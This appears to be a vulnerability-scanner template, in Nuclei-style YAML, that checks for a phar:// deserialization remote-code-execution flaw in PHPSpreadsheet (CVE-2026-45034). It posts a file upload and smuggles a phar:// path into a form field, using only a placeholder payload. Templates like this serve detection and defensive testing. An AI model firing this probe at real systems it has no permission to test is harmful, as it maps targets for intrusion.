id: CVE-2026-45034

info:
  name: PHPSpreadsheet Phar Deserialization RCE
  author: Cyber DarkNay
  severity: critical
  description: |
    PHPSpreadsheet library allows phar:// deserialization via file upload,
    leading to unauthenticated RCE.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45034
  tags: cve,cve2026,rce,phar,deserialization

variables:
  filename: "{{randstr}}.xlsx"
  payload: "test"

requests:
  - raw:
      - |
        POST /vendor/phpoffice/phpspreadsheet/samples/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

        ------WebKitFormBoundary
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

        {{payload}}
        ------WebKitFormBoundary
        Content-Disposition: form-data; name="filename"

        phar://{{filename}}/test.txt
        ------WebKitFormBoundary--

    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "Spreadsheet"
          - "loaded"